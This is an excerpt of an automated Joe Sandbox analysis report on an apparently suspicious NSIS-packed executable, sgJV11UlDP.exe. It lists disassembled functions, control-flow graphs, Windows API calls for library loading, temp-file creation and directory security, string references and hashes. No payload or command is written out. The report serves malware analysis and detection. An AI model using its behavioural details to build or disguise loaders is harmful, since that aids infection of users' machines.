                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp$C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens$Call
                                                                      • API String ID: 1941528284-1387062751
                                                                      • Opcode ID: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                      • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                      • Opcode Fuzzy Hash: d15347f228c0b4bd8738a051a150b1dc970c713c15b2eeb4a2e68bd68b67128e
                                                                      • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 629 405114-405129 630 4051df-4051e3 629->630 631 40512f-405141 629->631 632 405143-405147 call 40600f 631->632 633 40514c-405158 lstrlenA 631->633 632->633 635 405175-405179 633->635 636 40515a-40516a lstrlenA 633->636 638 405188-40518c 635->638 639 40517b-405182 SetWindowTextA 635->639 636->630 637 40516c-405170 lstrcatA 636->637 637->635 640 4051d2-4051d4 638->640 641 40518e-4051d0 SendMessageA * 3 638->641 639->638 640->630 642 4051d6-4051d9 640->642 641->640 642->630
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                      • lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0), ref: 00405170
                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll), ref: 00405182
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll
                                                                      • API String ID: 2531174081-4135159604
                                                                      • Opcode ID: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                      • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                      • Opcode Fuzzy Hash: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                      • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 643 402ffb-40300f 644 403011 643->644 645 403018-403021 643->645 644->645 646 403023 645->646 647 40302a-40302f 645->647 646->647 648 403031-40303a call 403200 647->648 649 40303f-40304c call 4031ea 647->649 648->649 653 403052-403056 649->653 654 4031d8 649->654 655 403183-403185 653->655 656 40305c-403082 GetTickCount 653->656 657 4031da-4031db 654->657 661 4031c5-4031c8 655->661 662 403187-40318a 655->662 658 4031e0 656->658 659 403088-403090 656->659 660 4031e3-4031e7 657->660 658->660 663 403092 659->663 664 403095-4030a3 call 4031ea 659->664 665 4031ca 661->665 666 4031cd-4031d6 call 4031ea 661->666 662->658 667 40318c 662->667 663->664 664->654 676 4030a9-4030b2 664->676 665->666 666->654 677 4031dd 666->677 670 40318f-403195 667->670 671 403197 670->671 672 403199-4031a7 call 4031ea 670->672 671->672 672->654 680 4031a9-4031ae call 405c2d 672->680 679 4030b8-4030d8 call 4064aa 676->679 677->658 685 40317b-40317d 679->685 686 4030de-4030f1 GetTickCount 679->686 684 4031b3-4031b5 680->684 687 4031b7-4031c1 684->687 688 40317f-403181 684->688 685->657 689 4030f3-4030fb 686->689 690 403136-403138 686->690 687->670 693 4031c3 687->693 688->657 694 403103-40312e MulDiv wsprintfA call 405114 689->694 695 4030fd-403101 689->695 691 40313a-40313e 690->691 692 40316f-403173 690->692 696 403140-403147 call 405c2d 691->696 697 403155-403160 691->697 692->659 698 403179 692->698 693->658 702 403133 694->702 695->690 695->694 703 40314c-40314e 696->703 701 403163-403167 697->701 698->658 701->679 704 40316d 701->704 702->690 703->688 705 403150-403153 703->705 704->658 705->701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%$s=y
                                                                      • API String ID: 551687249-665027819
                                                                      • Opcode ID: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                      • Instruction ID: 7192b2bd781d1e73c4002c8dab31bcfd9076020614228c7b813c8c88a4a42f55
                                                                      • Opcode Fuzzy Hash: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                      • Instruction Fuzzy Hash: 63517931901209ABCB10DF65DA44A9F7BBCEF18766F14413BE810BB2D0C7799B41CBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 706 4055da-405625 CreateDirectoryA 707 405627-405629 706->707 708 40562b-405638 GetLastError 706->708 709 405652-405654 707->709 708->709 710 40563a-40564e SetFileSecurityA 708->710 710->707 711 405650 GetLastError 710->711 711->709
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                      • GetLastError.KERNEL32 ref: 00405631
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                      • GetLastError.KERNEL32 ref: 00405650
                                                                      Strings
                                                                      • C:\Users\user\Desktop, xrefs: 004055DA
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405600
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-1326413622
                                                                      • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                      • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                      • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                      • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 712 406317-406337 GetSystemDirectoryA 713 406339 712->713 714 40633b-40633d 712->714 713->714 715 40634d-40634f 714->715 716 40633f-406347 714->716 718 406350-406382 wsprintfA LoadLibraryExA 715->718 716->715 717 406349-40634b 716->717 717->718
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                      • wsprintfA.USER32 ref: 00406367
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                      • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                      • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 719 40206a-402076 720 402131-402133 719->720 721 40207c-402092 call 402b2c * 2 719->721 722 4022a4-4022a9 call 401423 720->722 730 4020a1-4020af LoadLibraryExA 721->730 731 402094-40209f GetModuleHandleA 721->731 728 4029b8-4029c7 722->728 733 4020b1-4020be GetProcAddress 730->733 734 40212a-40212c 730->734 731->730 731->733 736 4020c0-4020c6 733->736 737 4020fd-402102 call 405114 733->737 734->722 738 4020c8-4020d4 call 401423 736->738 739 4020df-4020f6 call 700216db 736->739 742 402107-40210a 737->742 738->742 750 4020d6-4020dd 738->750 745 4020f8-4020fb 739->745 742->728 743 402110-402118 call 4037aa 742->743 743->728 749 40211e-402125 FreeLibrary 743->749 745->742 749->728 750->742
                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00402095
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                        • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0), ref: 00405170
                                                                        • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll), ref: 00405182
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020A5
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040211F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID: /z
                                                                      • API String ID: 2987980305-1190999251
                                                                      • Opcode ID: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                      • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                      • Opcode Fuzzy Hash: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                      • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 752 405bb5-405bbf 753 405bc0-405beb GetTickCount GetTempFileNameA 752->753 754 405bfa-405bfc 753->754 755 405bed-405bef 753->755 756 405bf4-405bf7 754->756 755->753 757 405bf1 755->757 757->756
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405BC9
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                      Strings
                                                                      • nsa, xrefs: 00405BC0
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BB8
                                                                      • "C:\Users\user\Desktop\sgJV11UlDP.exe", xrefs: 00405BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\sgJV11UlDP.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3616793596
                                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                      • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                      • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 758 700216db-70021717 call 70021a98 762 70021834-70021836 758->762 763 7002171d-70021721 758->763 764 70021723-70021729 call 700222af 763->764 765 7002172a-70021737 call 700222f1 763->765 764->765 770 70021767-7002176e 765->770 771 70021739-7002173e 765->771 772 70021770-7002178c call 700224d8 call 70021559 call 70021266 GlobalFree 770->772 773 7002178e-70021792 770->773 774 70021740-70021741 771->774 775 70021759-7002175c 771->775 795 700217e3-700217e7 772->795 779 70021794-700217da call 7002156b call 700224d8 773->779 780 700217dc-700217e2 call 700224d8 773->780 777 70021743-70021744 774->777 778 70021749-7002174a call 70022a38 774->778 775->770 781 7002175e-7002175f call 70022cc3 775->781 783 70021751-70021757 call 700226b2 777->783 784 70021746-70021747 777->784 790 7002174f 778->790 779->795 780->795 793 70021764 781->793 799 70021766 783->799 784->770 784->778 790->793 793->799 800 70021824-7002182b 795->800 801 700217e9-700217f7 call 7002249e 795->801 799->770 800->762 806 7002182d-7002182e GlobalFree 800->806 808 700217f9-700217fc 801->808 809 7002180f-70021816 801->809 806->762 808->809 810 700217fe-70021806 808->810 809->800 811 70021818-70021823 call 700214e2 809->811 810->809 812 70021808-70021809 FreeLibrary 810->812 811->800 812->809
                                                                      APIs
                                                                        • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D09
                                                                        • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D0E
                                                                        • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D13
                                                                      • GlobalFree.KERNEL32(00000000), ref: 70021786
                                                                      • FreeLibrary.KERNEL32(?), ref: 70021809
                                                                      • GlobalFree.KERNEL32(00000000), ref: 7002182E
                                                                        • Part of subcall function 700222AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700222E0
                                                                        • Part of subcall function 700226B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70021757,00000000), ref: 70022782
                                                                        • Part of subcall function 7002156B: wsprintfA.USER32 ref: 70021599
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1895783302.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                      • Associated: 00000000.00000002.1895725058.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895885805.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1895913966.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_70020000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                      • String ID:
                                                                      • API String ID: 3962662361-3916222277
                                                                      • Opcode ID: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
                                                                      • Instruction ID: d26e5cec9199b6e92e57e19f15da0513dfe9973c9afe60b1a37dcf125d06428f
                                                                      • Opcode Fuzzy Hash: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
                                                                      • Instruction Fuzzy Hash: 4B41B172104204AEDB01AF74EDC5BDE37FDBB54A32F248069F9069A297DF749485CBA0
                                                                      APIs
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                        • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                        • Part of subcall function 004055DA: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,000000F0), ref: 0040163C
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 00401631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
